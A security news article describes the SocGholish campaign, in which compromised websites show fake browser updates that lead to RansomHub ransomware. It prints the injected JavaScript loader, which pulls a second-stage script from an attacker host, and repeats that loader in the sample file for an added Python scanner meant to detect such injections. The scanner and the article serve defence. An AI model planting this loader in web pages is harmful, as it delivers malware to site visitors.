SocGholish Leveraging Compromised Websites To Deploy RansomHub Ransomware


Mar 18, 2025 - 08:54

The cybersecurity landscape has witnessed a concerning development as threat actors behind SocGholish have begun weaponizing compromised websites to distribute the dangerous RansomHub ransomware.

This sophisticated attack chain involves multiple stages of deception, beginning with legitimate websites that have been infiltrated and modified to serve malicious JavaScript to unsuspecting visitors.

SocGholish, a notorious JavaScript-based malware framework, typically masquerades as browser updates to trick users into downloading malicious payloads.

The campaign uses compromised websites as initial infection vectors, creating a widespread distribution network that’s difficult to detect and mitigate.

The infection begins when users visit these legitimate but compromised websites, which then display fake browser update notifications.

Trend Micro Security researchers identified this evolving threat campaign targeting organizations across multiple sectors, with a particular focus on healthcare, finance, and manufacturing industries.

Their analysis revealed that the threat actors have enhanced their techniques to evade detection while expanding their ransomware deployment capabilities.

The newly observed attack chain now culminates in the deployment of RansomHub ransomware, a relatively new but increasingly prevalent ransomware variant that implements strong encryption algorithms and sophisticated evasion techniques.

Once executed, RansomHub encrypts files across local and network drives, demanding cryptocurrency payments for decryption keys.

Investigation of the compromised websites revealed injected obfuscated JavaScript code, typically inserted near the end of legitimate JavaScript files or directly into HTML content.

Attack Chain

The infection sequence begins with compromised websites containing injected JavaScript code that evaluates the visitor’s browser environment.

The malicious code snippet resembles:

(function(){
    var d = document;
    // create a new <script> element at runtime
    var s = d.createElement('script');
    // point it at the attacker-controlled host (defanged here)
    s.src = 'https://compromised-cdn[.]com/updater.js';
    // append it to <head> so the browser fetches and runs the second stage
    d.getElementsByTagName('head')[0].appendChild(s);
})();

This innocuous-looking code loads additional scripts from attacker-controlled domains.
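To turn the two observations above (a runtime script loader pointing at an outside host, injected near the end of otherwise legitimate files) into a check a site owner can run over their own web root, here is an added example scanner. It is not Trend Micro's tooling or code from the campaign; the sample file, the `.invalid` host and the allowlist are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Runtime script injection as in the loader shown above: a <script> element is
# created and its src pointed at another host.
CREATE_SCRIPT_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I)
SRC_ASSIGN_RE = re.compile(r"\.src\s*=\s*['\"](https?://[^'\"]+)['\"]", re.I)
# Static <script src="..."> tags injected straight into HTML content.
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"](https?://[^'\"]+)['\"]", re.I)


def find_external_loaders(text, allowed_hosts, tail_lines=3):
    """Return findings for script loads whose host is not on the allowlist.

    Each finding records the host, whether the load is built with createElement
    (the dynamic pattern the article shows) and whether it sits in the last
    `tail_lines` lines, where injected code is typically appended. Single-line
    (minified) files need a byte-offset heuristic instead of a line count.
    """
    allowed = {h.lower() for h in allowed_hosts}
    total_lines = text.count("\n")
    findings = []
    for regex in (SRC_ASSIGN_RE, SCRIPT_TAG_RE):
        for m in regex.finditer(text):
            url = m.group(1)
            host = (urlparse(url).hostname or "").lower()
            if host in allowed:
                continue
            # Look back a short window for the createElement('script') call.
            window = text[max(0, m.start() - 400):m.start()]
            line_no = text[:m.start()].count("\n")
            findings.append({
                "host": host,
                "url": url,
                "dynamic": bool(CREATE_SCRIPT_RE.search(window)),
                "in_tail": line_no >= total_lines - tail_lines,
            })
    return findings


# Constructed sample: a benign site script with a loader appended at the end.
SAMPLE_JS = (
    "/* site.js */\n"
    "function initMenu(){ document.querySelectorAll('nav a').forEach(function(a){ a.onclick = toggle; }); }\n"
    "function toggle(){ this.classList.toggle('open'); }\n"
    "window.addEventListener('load', initMenu);\n"
    "(function(){var d=document;var s=d.createElement('script');"
    "s.src='https://cdn-placeholder.invalid/updater.js';"
    "d.getElementsByTagName('head')[0].appendChild(s);})();\n"
)
ALLOWED_HOSTS = {"www.example.com", "code.jquery.com"}  # placeholder allowlist

if __name__ == "__main__":
    for finding in find_external_loaders(SAMPLE_JS, ALLOWED_HOSTS):
        print(finding)
```

Run it over every `.js` and `.html` file under the web root and review any finding marked both `dynamic` and `in_tail` first; a host that is not on the allowlist is the signal, not the exact bytes of the loader, which vary per site.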

SocGholish delivery flow from compromised website to payload delivery (Source – Trend Micro)

The second-stage JavaScript performs extensive environment checks to avoid detection in sandboxes or analysis environments.

Browser fingerprinting techniques determine if the victim uses Chrome, Firefox, or Edge before displaying the appropriate fake update notification.

When users interact with these fake update notices, they download a ZIP file containing a malicious JavaScript file.

This file, when executed, establishes persistence through scheduled tasks and registry modifications before retrieving the RansomHub payload from command-and-control servers.

The ransomware payload itself utilizes sophisticated techniques including process hollowing and API unhooking to bypass security solutions.

The infection culminates in file encryption and the delivery of a ransom note demanding payment for file recovery.

Security experts recommend implementing robust web filtering solutions, keeping browsers updated, and training users to recognize fake update notifications as critical mitigation strategies against this evolving threat.

